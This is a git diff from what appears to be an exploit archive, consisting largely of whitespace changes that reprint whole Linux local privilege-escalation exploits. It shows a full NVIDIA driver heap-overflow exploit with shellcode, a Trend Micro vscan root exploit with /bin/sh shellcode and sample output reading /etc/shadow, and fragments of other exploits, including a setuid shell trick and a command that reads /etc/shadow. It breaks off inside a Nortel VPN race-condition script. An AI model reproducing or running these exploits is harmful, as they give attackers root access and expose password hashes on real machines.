- * purpose with or without fee is hereby granted, provided that the above - * copyright notice and this permission notice appear in all copies. - * - * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES - * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF - * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR - * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES - * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN - * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF - * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - * - * Exploit for Buffer Overflow in NVIDIA Binary Graphics Driver For Linux - * see http://www.rapid7.com/advisories/R7-0025.jsp for original advisory. - */ -#include -#include -#include - -#include -#include - -int done = 0; -unsigned long black_pixel; - -/* This exploit takes two arguments: - * o The lowest address past X's heap. - * o X's data address. - * - * Note the first address required is usually - * in the 0xbXXXXXXX range, as the exploit - * forces the nvidia driver to allocate a large - * sum of memory. - * - * This information can be easily taken using: - * cat /proc/`pgrep Xorg`/maps | head -n 5 - * - * On a sample system, this was: - * - * 08048000-081b8000 r-xp 00000000 09:02 58721202 /usr/bin/Xorg - * 081b8000-081c7000 rw-p 00170000 09:02 58721202 /usr/bin/Xorg - * 081c7000-08533000 rw-p 081c7000 00:00 0 [heap] - * b5bbc000-b60bd000 rw-s e35f9000 00:0d 12154 /dev/nvidia0 - * b60bd000-b6112000 rw-p b60bd000 00:00 0 - * - * Thus, one would use: - * - * ./nv_exploit 0xb5bbc000 0x081b8000 - * - * To run the exploit. Note that although the exploit "best guesses" - * the correct spot to write the shellcode, it may be off. This - * may be tweaked by modifying the 0x2C0000 in the source below. - * If the data is written to an incorrect location where vital - * X program data is stored, X will (eventually, if not immediately) - * crash. - * - * The exploit works by overwriting the address of free() in the - * Global Offset Table to an address offset relative to the supplied - * GOT address (second argument). The NVIDIA driver will then call - * Xfree, which will in turn call free() using the overwritten GOT - * entry and nop slide to the shellcode. - */ - - -/* The shellcode below will execute a shell script located - * at /tmp/nv. */ -unsigned char shellcode[] = - "\xb8\x02\x00\x00\x00\xcd\x80\x85\xc0\x75\xfe\x31\xc0\x68\x2f\x6e" - "\x76\x00\x68\x2f\x74\x6d\x70\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb8" - "\x0b\x00\x00\x00\xcd\x80"; - -typedef struct { - Display *display; - XtAppContext app; - Window win; - XftFont *font; - XftColor color, bg; - XftDraw *draw; - GC gc; -} XDataStr; - -static void -sigHandler(int sig) -{ - done = 1; -} - -int -createWin(XDataStr *data) -{ - u_long attributeMask; - XSetWindowAttributes attribute; - Window w; - Display *display = data->display; - int screen = DefaultScreen(display); - XGCValues gc_val; - Screen *s; - - attribute.background_pixel = WhitePixel(display, screen); - attribute.border_pixel = WhitePixel(display, screen); - attribute.bit_gravity = NorthWestGravity; - attribute.event_mask = ButtonPressMask|ButtonReleaseMask|KeyPressMask| - ExposureMask; - - attributeMask = - CWBorderPixel | - CWBackPixel | - CWEventMask | - CWBitGravity; - s = ScreenOfDisplay(data->display, screen); - - w = XCreateWindow(display, RootWindow(display, screen), 0, 0, - DisplayWidth(display, screen)/2, 150, - 0, DefaultDepth(display, screen), InputOutput, - DefaultVisual(display, screen), attributeMask, &attribute); - - data->font = XftFontOpen(display, screen, - XFT_FAMILY, XftTypeString, "mono", - XFT_SIZE, XftTypeInteger, 16, - NULL); - if (!XftColorAllocName(display, XDefaultVisual(display, screen), - DefaultColormap(display, screen), "red4", &data->color)) { - fprintf(stderr, "cannot get color"); - return -1; - } - if (!XftColorAllocName(display, XDefaultVisual(display, screen), - DefaultColormap(display, screen), "linen", &data->bg)) { - fprintf(stderr, "cannot get bg color"); - return -1; - } - data->draw = XftDrawCreate(display, w, DefaultVisual(display, screen), - DefaultColormap(display, screen)); - gc_val.foreground = BlackPixel(display, screen); - gc_val.background = WhitePixel(display, screen); - data->gc = XCreateGC (display, w, GCForeground|GCBackground, - &gc_val); - - data->win = w; - return 0; -} - -void -show(XDataStr *data) -{ - Status s; - - XMapWindow(data->display, data->win); - s = XGrabKeyboard(data->display, data->win, False, - GrabModeAsync, GrabModeAsync, CurrentTime); - if (s != GrabSuccess) { - printf("Error grabing kbd %d\n", s); - } -} - -int -main(int argc, char *argv[]) -{ - Display *display; - Widget toplevel; - XtAppContext app_con; - XEvent event; - char c, *string; - unsigned int i; - XDataStr *data; - XExposeEvent *expose = (XExposeEvent *)&event; - unsigned int heapaddr, gotaddr; - - if (argc > 2) - { - heapaddr = strtoul(argv[1],NULL,0); - gotaddr = strtoul(argv[2],NULL,0); - } - else - { - printf("Usage: %s \n\n", argv[0]); - return 0; - } - - toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0, - &argc, argv, NULL, NULL, 0); - display = XtDisplay(toplevel); - - data = (XDataStr *)malloc(sizeof(XDataStr)); - if (data == NULL) { - perror("malloc"); - exit(EXIT_FAILURE); - } - - data->display = display; - data->app = app_con; - - if (createWin(data) < 0) { - fprintf(stderr, "can't create Data Window"); - exit(EXIT_FAILURE); - } - show(data); - - signal(SIGINT, sigHandler); - signal(SIGHUP, sigHandler); - signal(SIGQUIT, sigHandler); - signal(SIGTERM, sigHandler); - - /************************************************************************ - * BEGIN FONT HEAP OVERFLOW SETUP CODE - * - * "It's so hard to write a graphics driver that open-sourcing it would - * not help." - * - Andrew Fear, Software Product Manager (NVIDIA Corporation). - **********************************************************************/ - XGlyphInfo * glyphs; - XRenderPictFormat fmt; - XRenderPictFormat *mask = 0; - GlyphSet gset; - char * buf =0; - int offset, cr, numB; - int xscreenpos = 32680; - int magic_len = 32768 - xscreenpos; - int wr_addr_len = 3548; - int wr_nop_len = 200; - - /* Calculate the offset to the Global Offset Table. - * 0x2C0000 is the size of the buffer the NVIDIA driver - * allocates for us when it is about to draw. - */ - offset = gotaddr-(heapaddr-0x2C0000); - offset += magic_len; - glyphs = malloc(sizeof(XGlyphInfo)*3); - - /* Payload glyph */ - glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */ - glyphs[0].height = 1; - glyphs[0].yOff = 0; - glyphs[0].xOff = glyphs[0].width; - glyphs[0].x = 0; - glyphs[0].y = 0; - - /* Large offset glyph (untweaked) */ - glyphs[1].width=0; - glyphs[1].height=0; - glyphs[1].yOff=32767; - glyphs[1].xOff=0; - glyphs[1].x = 0; - glyphs[1].y = 0; - - /* Small offset glyph (tweaked) */ - glyphs[2].width=0; - glyphs[2].height=0; - glyphs[2].yOff=0; - glyphs[2].xOff=0; - glyphs[2].x = 0; - glyphs[2].y = 0; - - fmt.type = PictTypeDirect; - fmt.depth = 8; - - Glyph * xglyphids = malloc(3*sizeof(Glyph)); - - xglyphids[0] = 'A'; - xglyphids[1] = 'B'; - xglyphids[2] = 'C'; - - int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */ - int bufsize = stride*glyphs[0].height; - buf = malloc(bufsize); - - /* Write jump address to the buffer a number of times */ - for (cr=0; crdraw, &data->bg, - expose->x, expose->y, - expose->width, expose->height); - /* Send malignant glyphs and execute shellcode on target */ - XRenderCompositeString8(display, PictOpOver, - XftDrawSrcPicture(data->draw, &data->color), - XftDrawPicture(data->draw), mask, gset, - 0, 0, xscreenpos, 0, string, strlen(string)); - break; - } - } - - free(glyphs); - free(xglyphids); - free(buf); - free(string); - - XFlush(display); - XUnmapWindow(data->display, data->win); - XUngrabKeyboard(data->display, CurrentTime); - XCloseDisplay(display); - exit(EXIT_SUCCESS); -} - -// milw0rm.com [2006-10-16] +/* + * Copyright (c) 2005 Matthieu Herrb + * Copyright (c) 2006 Derek Abdine, Marc Bevand + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + * + * Exploit for Buffer Overflow in NVIDIA Binary Graphics Driver For Linux + * see http://www.rapid7.com/advisories/R7-0025.jsp for original advisory. + */ +#include +#include +#include + +#include +#include + +int done = 0; +unsigned long black_pixel; + +/* This exploit takes two arguments: + * o The lowest address past X's heap. + * o X's data address. + * + * Note the first address required is usually + * in the 0xbXXXXXXX range, as the exploit + * forces the nvidia driver to allocate a large + * sum of memory. + * + * This information can be easily taken using: + * cat /proc/`pgrep Xorg`/maps | head -n 5 + * + * On a sample system, this was: + * + * 08048000-081b8000 r-xp 00000000 09:02 58721202 /usr/bin/Xorg + * 081b8000-081c7000 rw-p 00170000 09:02 58721202 /usr/bin/Xorg + * 081c7000-08533000 rw-p 081c7000 00:00 0 [heap] + * b5bbc000-b60bd000 rw-s e35f9000 00:0d 12154 /dev/nvidia0 + * b60bd000-b6112000 rw-p b60bd000 00:00 0 + * + * Thus, one would use: + * + * ./nv_exploit 0xb5bbc000 0x081b8000 + * + * To run the exploit. Note that although the exploit "best guesses" + * the correct spot to write the shellcode, it may be off. This + * may be tweaked by modifying the 0x2C0000 in the source below. + * If the data is written to an incorrect location where vital + * X program data is stored, X will (eventually, if not immediately) + * crash. + * + * The exploit works by overwriting the address of free() in the + * Global Offset Table to an address offset relative to the supplied + * GOT address (second argument). The NVIDIA driver will then call + * Xfree, which will in turn call free() using the overwritten GOT + * entry and nop slide to the shellcode. + */ + + +/* The shellcode below will execute a shell script located + * at /tmp/nv. */ +unsigned char shellcode[] = + "\xb8\x02\x00\x00\x00\xcd\x80\x85\xc0\x75\xfe\x31\xc0\x68\x2f\x6e" + "\x76\x00\x68\x2f\x74\x6d\x70\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb8" + "\x0b\x00\x00\x00\xcd\x80"; + +typedef struct { + Display *display; + XtAppContext app; + Window win; + XftFont *font; + XftColor color, bg; + XftDraw *draw; + GC gc; +} XDataStr; + +static void +sigHandler(int sig) +{ + done = 1; +} + +int +createWin(XDataStr *data) +{ + u_long attributeMask; + XSetWindowAttributes attribute; + Window w; + Display *display = data->display; + int screen = DefaultScreen(display); + XGCValues gc_val; + Screen *s; + + attribute.background_pixel = WhitePixel(display, screen); + attribute.border_pixel = WhitePixel(display, screen); + attribute.bit_gravity = NorthWestGravity; + attribute.event_mask = ButtonPressMask|ButtonReleaseMask|KeyPressMask| + ExposureMask; + + attributeMask = + CWBorderPixel | + CWBackPixel | + CWEventMask | + CWBitGravity; + s = ScreenOfDisplay(data->display, screen); + + w = XCreateWindow(display, RootWindow(display, screen), 0, 0, + DisplayWidth(display, screen)/2, 150, + 0, DefaultDepth(display, screen), InputOutput, + DefaultVisual(display, screen), attributeMask, &attribute); + + data->font = XftFontOpen(display, screen, + XFT_FAMILY, XftTypeString, "mono", + XFT_SIZE, XftTypeInteger, 16, + NULL); + if (!XftColorAllocName(display, XDefaultVisual(display, screen), + DefaultColormap(display, screen), "red4", &data->color)) { + fprintf(stderr, "cannot get color"); + return -1; + } + if (!XftColorAllocName(display, XDefaultVisual(display, screen), + DefaultColormap(display, screen), "linen", &data->bg)) { + fprintf(stderr, "cannot get bg color"); + return -1; + } + data->draw = XftDrawCreate(display, w, DefaultVisual(display, screen), + DefaultColormap(display, screen)); + gc_val.foreground = BlackPixel(display, screen); + gc_val.background = WhitePixel(display, screen); + data->gc = XCreateGC (display, w, GCForeground|GCBackground, + &gc_val); + + data->win = w; + return 0; +} + +void +show(XDataStr *data) +{ + Status s; + + XMapWindow(data->display, data->win); + s = XGrabKeyboard(data->display, data->win, False, + GrabModeAsync, GrabModeAsync, CurrentTime); + if (s != GrabSuccess) { + printf("Error grabing kbd %d\n", s); + } +} + +int +main(int argc, char *argv[]) +{ + Display *display; + Widget toplevel; + XtAppContext app_con; + XEvent event; + char c, *string; + unsigned int i; + XDataStr *data; + XExposeEvent *expose = (XExposeEvent *)&event; + unsigned int heapaddr, gotaddr; + + if (argc > 2) + { + heapaddr = strtoul(argv[1],NULL,0); + gotaddr = strtoul(argv[2],NULL,0); + } + else + { + printf("Usage: %s \n\n", argv[0]); + return 0; + } + + toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0, + &argc, argv, NULL, NULL, 0); + display = XtDisplay(toplevel); + + data = (XDataStr *)malloc(sizeof(XDataStr)); + if (data == NULL) { + perror("malloc"); + exit(EXIT_FAILURE); + } + + data->display = display; + data->app = app_con; + + if (createWin(data) < 0) { + fprintf(stderr, "can't create Data Window"); + exit(EXIT_FAILURE); + } + show(data); + + signal(SIGINT, sigHandler); + signal(SIGHUP, sigHandler); + signal(SIGQUIT, sigHandler); + signal(SIGTERM, sigHandler); + + /************************************************************************ + * BEGIN FONT HEAP OVERFLOW SETUP CODE + * + * "It's so hard to write a graphics driver that open-sourcing it would + * not help." + * - Andrew Fear, Software Product Manager (NVIDIA Corporation). + **********************************************************************/ + XGlyphInfo * glyphs; + XRenderPictFormat fmt; + XRenderPictFormat *mask = 0; + GlyphSet gset; + char * buf =0; + int offset, cr, numB; + int xscreenpos = 32680; + int magic_len = 32768 - xscreenpos; + int wr_addr_len = 3548; + int wr_nop_len = 200; + + /* Calculate the offset to the Global Offset Table. + * 0x2C0000 is the size of the buffer the NVIDIA driver + * allocates for us when it is about to draw. + */ + offset = gotaddr-(heapaddr-0x2C0000); + offset += magic_len; + glyphs = malloc(sizeof(XGlyphInfo)*3); + + /* Payload glyph */ + glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */ + glyphs[0].height = 1; + glyphs[0].yOff = 0; + glyphs[0].xOff = glyphs[0].width; + glyphs[0].x = 0; + glyphs[0].y = 0; + + /* Large offset glyph (untweaked) */ + glyphs[1].width=0; + glyphs[1].height=0; + glyphs[1].yOff=32767; + glyphs[1].xOff=0; + glyphs[1].x = 0; + glyphs[1].y = 0; + + /* Small offset glyph (tweaked) */ + glyphs[2].width=0; + glyphs[2].height=0; + glyphs[2].yOff=0; + glyphs[2].xOff=0; + glyphs[2].x = 0; + glyphs[2].y = 0; + + fmt.type = PictTypeDirect; + fmt.depth = 8; + + Glyph * xglyphids = malloc(3*sizeof(Glyph)); + + xglyphids[0] = 'A'; + xglyphids[1] = 'B'; + xglyphids[2] = 'C'; + + int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */ + int bufsize = stride*glyphs[0].height; + buf = malloc(bufsize); + + /* Write jump address to the buffer a number of times */ + for (cr=0; crdraw, &data->bg, + expose->x, expose->y, + expose->width, expose->height); + /* Send malignant glyphs and execute shellcode on target */ + XRenderCompositeString8(display, PictOpOver, + XftDrawSrcPicture(data->draw, &data->color), + XftDrawPicture(data->draw), mask, gset, + 0, 0, xscreenpos, 0, string, strlen(string)); + break; + } + } + + free(glyphs); + free(xglyphids); + free(buf); + free(string); + + XFlush(display); + XUnmapWindow(data->display, data->win); + XUngrabKeyboard(data->display, CurrentTime); + XCloseDisplay(display); + exit(EXIT_SUCCESS); +} + +// milw0rm.com [2006-10-16] diff --git a/platforms/linux/local/273.c b/platforms/linux/local/273.c index b8e56ae96..b0be182eb 100755 --- a/platforms/linux/local/273.c +++ b/platforms/linux/local/273.c @@ -57,6 +57,6 @@ return 0; } - - -// milw0rm.com [2004-04-20] + + +// milw0rm.com [2004-04-20] diff --git a/platforms/linux/local/285.c b/platforms/linux/local/285.c index 807276b90..c122c9c79 100755 --- a/platforms/linux/local/285.c +++ b/platforms/linux/local/285.c @@ -45,6 +45,6 @@ int main(int argc, char **argv) { printf("Hit ' . ' to go \n"); execl("/usr/bin/Mail","Mail","x","-s","x","-c",buffer,0); } - - -// milw0rm.com [2001-03-03] + + +// milw0rm.com [2001-03-03] diff --git a/platforms/linux/local/290.sh b/platforms/linux/local/290.sh index 626520664..bf8c06368 100755 --- a/platforms/linux/local/290.sh +++ b/platforms/linux/local/290.sh @@ -20,6 +20,6 @@ chmod 6755 /var/tmp/.nothing rm /etc/initscript _init_ -echo i nawet go podmienilem - -# milw0rm.com [2001-03-04] +echo i nawet go podmienilem + +# milw0rm.com [2001-03-04] diff --git a/platforms/linux/local/317.txt b/platforms/linux/local/317.txt index bd3ecd413..7b9bf4512 100755 --- a/platforms/linux/local/317.txt +++ b/platforms/linux/local/317.txt @@ -1,3 +1,3 @@ -setenv RESOLV_HOST_CONF /etc/shadow; ping adfas - -# milw0rm.com [1996-01-01] +setenv RESOLV_HOST_CONF /etc/shadow; ping adfas + +# milw0rm.com [1996-01-01] diff --git a/platforms/linux/local/320.pl b/platforms/linux/local/320.pl index ed52fd6a0..8bd07f997 100755 --- a/platforms/linux/local/320.pl +++ b/platforms/linux/local/320.pl @@ -2,6 +2,6 @@ $ENV{PATH}="/bin:/usr/bin"; $>=0;$<=0; exec("/bin/bash"); - - -# milw0rm.com [1996-06-01] + + +# milw0rm.com [1996-06-01] diff --git a/platforms/linux/local/3213.c b/platforms/linux/local/3213.c index 00210a1c1..c046b3f4b 100755 --- a/platforms/linux/local/3213.c +++ b/platforms/linux/local/3213.c @@ -1,155 +1,155 @@ -/* - - Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) - - Author: Sebastian Wolfgarten / sebastian@wolfgarten.com / http://www.devtarget.org - - Date: January 3rd, 2007 - - Severity: Medium - - Description: - - The product "InterScan VirusWall 3.81 for Linux" ships a library called - "libvsapi.so" which is vulnerable to a memory corruption vulnerability. - - One of the applications that apparently uses this library is called "vscan" - which is set suid root by default. It was discovered that this supporting - program is prone to a classic buffer overflow vulnerability when a particularly - long command-line argument is being passed and the application utilizes the flawed - library to attempt to copy that data into a finite buffer. - - As vscan is set suid root, this leads to arbitrary code execution with root level - privileges. However the severity of this vulnerability is probably "medium" as by default - the vscan file is only executable by the root user as well as members of the "iscan" - group which is created during the installation of the software. - - Example: - - sebastian@debian31:~$ ./tmvwall381v3_exp - - Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) - Author: Sebastian Wolfgarten, - Date: January 3rd, 2007 - - Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. - - Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! - Virus Scanner v3.1, VSAPI v8.310-1002 - Trend Micro Inc. 1996,1997 - Pattern number 4.155.00 - - sh-2.05b# id - uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) - - sh-2.05b# cat /etc/shadow - - root:***REMOVED***:13372:0:99999:7::: - daemon:*:13372:0:99999:7::: - bin:*:13372:0:99999:7::: - sys:*:13372:0:99999:7::: - sync:*:13372:0:99999:7::: - games:*:13372:0:99999:7::: - man:*:13372:0:99999:7::: - lp:*:13372:0:99999:7::: - mail:*:13372:0:99999:7::: - news:*:13372:0:99999:7::: - uucp:*:13372:0:99999:7::: - proxy:*:13372:0:99999:7::: - www-data:*:13372:0:99999:7::: - backup:*:13372:0:99999:7::: - list:*:13372:0:99999:7::: - irc:*:13372:0:99999:7::: - gnats:*:13372:0:99999:7::: - nobody:*:13372:0:99999:7::: - Debian-exim:!:13372:0:99999:7::: - sshd:!:13372:0:99999:7::: - postfix:!:13500:0:99999:7::: - mysql:!:13500:0:99999:7::: - vmail:!:13500:0:99999:7::: - amavis:!:13500:0:99999:7::: - iscan:!:13500:0:99999:7::: - sebastian:***REMOVED***:13500:0:99999:7::: - - Credits: - - Must go to Aleph One for the shellcode and mercy for bits of the code. - -*/ - -#include -#include -#include - -#define NOP 0x90 -#define vscan "/opt/trend/ISBASE/IScan.BASE/vscan" - -// Shellcode by Aleph One -char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" - "\x80\xe8\xdc\xff\xff\xff/bin/sh"; - -unsigned long get_sp(void) { - - __asm__("movl %esp, %eax"); - -} - -int main(int argc, char *argv[], char **envp) { - - // Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP) - int buff = 1120; - - // Address of the shellcode - unsigned long addr; - - // Temporarily used to add nops etc. - char *ptr; - - printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)\n"); - printf("Author: Sebastian Wolfgarten, \n"); - printf("Date: January 3rd, 2007\n\n"); - - // Check permissions on vscan executable, if this fails exploitation is infeasible. - if (access(vscan, 01) != -1) { - - printf("Okay, %s is executable and by the way, your current user id is %d.\n",vscan,getuid()); - - // Allocate memory for filling the buffer - if((ptr = (char *)malloc(buff)) == NULL) { - - printf("Error allocating memory!\n"); - exit(-1); - - } - - // Determine the address of the shellcode with the inline assembly above - addr = get_sp(); - - // Add the NOP's to the buffer - memset(ptr, NOP, buff); - - // Add the shellcode - memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); - - // The return address - *(long *)&ptr[buff - 4] = addr; - - // Off we go, execute the vulnerable program - printf("\nExecuting %s. Afterwards check your privilege level with id or whoami!\n",vscan); - execl(vscan, "vscan", ptr, NULL); - - } else { - - printf("Exploit failed. You seem not to have enough privileges to execute %s, sorry.\n",vscan); - printf("Hint: Ask your local admin to add yourself to the iscan group or let him make the vscan binary world-executable.\n"); - printf("Then try again :-)\n\n"); - exit(1); - - } - - return 0; - -} - -// milw0rm.com [2007-01-28] +/* + + Title: Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) + + Author: Sebastian Wolfgarten / sebastian@wolfgarten.com / http://www.devtarget.org + + Date: January 3rd, 2007 + + Severity: Medium + + Description: + + The product "InterScan VirusWall 3.81 for Linux" ships a library called + "libvsapi.so" which is vulnerable to a memory corruption vulnerability. + + One of the applications that apparently uses this library is called "vscan" + which is set suid root by default. It was discovered that this supporting + program is prone to a classic buffer overflow vulnerability when a particularly + long command-line argument is being passed and the application utilizes the flawed + library to attempt to copy that data into a finite buffer. + + As vscan is set suid root, this leads to arbitrary code execution with root level + privileges. However the severity of this vulnerability is probably "medium" as by default + the vscan file is only executable by the root user as well as members of the "iscan" + group which is created during the installation of the software. + + Example: + + sebastian@debian31:~$ ./tmvwall381v3_exp + + Local root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux) + Author: Sebastian Wolfgarten, + Date: January 3rd, 2007 + + Okay, /opt/trend/ISBASE/IScan.BASE/vscan is executable and by the way, your current user id is 5002. + + Executing /opt/trend/ISBASE/IScan.BASE/vscan. Afterwards check your privilege level with id or whoami! + Virus Scanner v3.1, VSAPI v8.310-1002 + Trend Micro Inc. 1996,1997 + Pattern number 4.155.00 + + sh-2.05b# id + uid=5002(sebastian) gid=100(users) euid=0(root) groups=100(users),5001(iscan) + + sh-2.05b# cat /etc/shadow + + root:***REMOVED***:13372:0:99999:7::: + daemon:*:13372:0:99999:7::: + bin:*:13372:0:99999:7::: + sys:*:13372:0:99999:7::: + sync:*:13372:0:99999:7::: + games:*:13372:0:99999:7::: + man:*:13372:0:99999:7::: + lp:*:13372:0:99999:7::: + mail:*:13372:0:99999:7::: + news:*:13372:0:99999:7::: + uucp:*:13372:0:99999:7::: + proxy:*:13372:0:99999:7::: + www-data:*:13372:0:99999:7::: + backup:*:13372:0:99999:7::: + list:*:13372:0:99999:7::: + irc:*:13372:0:99999:7::: + gnats:*:13372:0:99999:7::: + nobody:*:13372:0:99999:7::: + Debian-exim:!:13372:0:99999:7::: + sshd:!:13372:0:99999:7::: + postfix:!:13500:0:99999:7::: + mysql:!:13500:0:99999:7::: + vmail:!:13500:0:99999:7::: + amavis:!:13500:0:99999:7::: + iscan:!:13500:0:99999:7::: + sebastian:***REMOVED***:13500:0:99999:7::: + + Credits: + + Must go to Aleph One for the shellcode and mercy for bits of the code. + +*/ + +#include +#include +#include + +#define NOP 0x90 +#define vscan "/opt/trend/ISBASE/IScan.BASE/vscan" + +// Shellcode by Aleph One +char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" + "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" + "\x80\xe8\xdc\xff\xff\xff/bin/sh"; + +unsigned long get_sp(void) { + + __asm__("movl %esp, %eax"); + +} + +int main(int argc, char *argv[], char **envp) { + + // Size of the vulnerable buffer (1116 + 4 bytes to overwrite EIP) + int buff = 1120; + + // Address of the shellcode + unsigned long addr; + + // Temporarily used to add nops etc. + char *ptr; + + printf("\nLocal root exploit for vscan/VSAPI (=Trend Micro VirusWall 3.81 on Linux)\n"); + printf("Author: Sebastian Wolfgarten, \n"); + printf("Date: January 3rd, 2007\n\n"); + + // Check permissions on vscan executable, if this fails exploitation is infeasible. + if (access(vscan, 01) != -1) { + + printf("Okay, %s is executable and by the way, your current user id is %d.\n",vscan,getuid()); + + // Allocate memory for filling the buffer + if((ptr = (char *)malloc(buff)) == NULL) { + + printf("Error allocating memory!\n"); + exit(-1); + + } + + // Determine the address of the shellcode with the inline assembly above + addr = get_sp(); + + // Add the NOP's to the buffer + memset(ptr, NOP, buff); + + // Add the shellcode + memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); + + // The return address + *(long *)&ptr[buff - 4] = addr; + + // Off we go, execute the vulnerable program + printf("\nExecuting %s. Afterwards check your privilege level with id or whoami!\n",vscan); + execl(vscan, "vscan", ptr, NULL); + + } else { + + printf("Exploit failed. You seem not to have enough privileges to execute %s, sorry.\n",vscan); + printf("Hint: Ask your local admin to add yourself to the iscan group or let him make the vscan binary world-executable.\n"); + printf("Then try again :-)\n\n"); + exit(1); + + } + + return 0; + +} + +// milw0rm.com [2007-01-28] diff --git a/platforms/linux/local/322.c b/platforms/linux/local/322.c index 0ff452d32..47fb52b6e 100755 --- a/platforms/linux/local/322.c +++ b/platforms/linux/local/322.c @@ -50,6 +50,6 @@ main(int argc, char **argv) *ptr = 0; execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); } - - -// milw0rm.com [1996-08-24] + + +// milw0rm.com [1996-08-24] diff --git a/platforms/linux/local/325.c b/platforms/linux/local/325.c index ab0cde222..f179ce11e 100755 --- a/platforms/linux/local/325.c +++ b/platforms/linux/local/325.c @@ -114,6 +114,6 @@ static void card(c, p2) *p1++ = '\n'; write(tfd, buf, len); } - - -// milw0rm.com [1996-10-25] + + +// milw0rm.com [1996-10-25] diff --git a/platforms/linux/local/331.c b/platforms/linux/local/331.c index 48ee5e72c..9dff8e398 100755 --- a/platforms/linux/local/331.c +++ b/platforms/linux/local/331.c @@ -63,6 +63,6 @@ i+=NOP_SIZE) { (mzhang@softcom.net)\n"); /* Don't need to set ur DISPLAY to exploit this one, cool huh? */ execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL); -} - -// milw0rm.com [1997-05-14] +} + +// milw0rm.com [1997-05-14] diff --git a/platforms/linux/local/3356.sh b/platforms/linux/local/3356.sh index 33d00dc4e..91f325894 100755 --- a/platforms/linux/local/3356.sh +++ b/platforms/linux/local/3356.sh @@ -1,195 +1,195 @@ -#!/bin/sh -# -# Nortel SSL VPN Linux Client race condition -# -# Jon Hart -# -# The Linux client that is utilized by versions priot to 6.05 of the Nortel -# SSL VPN appliance suffers from a number of problems that, in combination, -# allow an unprivileged local user to obtain root privileges. -# -# This particular bug is as follows: -# 1) SSL VPN is initiated from the startNetdirect() javascript call -# 2) A zip archive is downloaded to the local machine which contains three -# binaries necessary for the client: askpass, client, and surun. This -# archive is written to /tmp, chmod'd 777, and then it is extracted into -# /tmp/NetClient -# 3) All of these files are chmod'd world writable by the following java -# snippet, which is called on all UNIX client OSs: -# -# protected boolean setPermissions(String file) -# { -# String command = "chmod a+xw " + file; -# try -# { -# Process p = Runtime.getRuntime().exec(command); -# p.waitFor(); -# } -# ... -# } -# -# 4) /tmp/NetClient/surun is executed, which in turn runs -# /tmp/NetClient/askpass. This process aquires the root password, and -# then executes /tmp/NetClient/client via /bin/su and the root password. -# -# There is clearly a bug in step 2 and 3 whereby files are installed world -# writable. The bug I chose to exploit is the race condition in step 4, -# combined with the insecure permissions of steps 2 and 3, which (IMO), -# gives root more easily. The risk here is if you have untrusted accounts -# on the machine from which you access the Nortel VPN, those accounts can -# easily gain local root access. -# -# The exploit is fairly simple. Wait for /tmp/NetClient/client to appear, -# swap it for our "special version", and wait for a shell. -# -# Notes: a /tmp with nosuid will help mitigate this particular _exploit_, -# but not the vulnerability. The same vulnerability also exists in the Mac -# client. -# -# For education and testing purposes only. Only run this on systems that -# you maintain/control. -# - -cleanup() { - rm -f $TMP_DIR/.*-$$\..* -} - - -run_cmd() { - CMD=$@ - VPN_CLIENT_RUN=`mktemp -t vpn_client_run-$$.XXXXXXXX` - - echo "Waiting for writable client" - while (true); do - if [ -w $CLIENT ]; then - OLD_CLIENT=`mktemp -t old_client-$$.XXXXXXXXXX` - echo "Saving old client" - cp $CLIENT $OLD_CLIENT - chmod 755 $OLD_CLIENT - echo "Writing new \"client\"" - echo "#!/bin/sh" > $CLIENT - echo 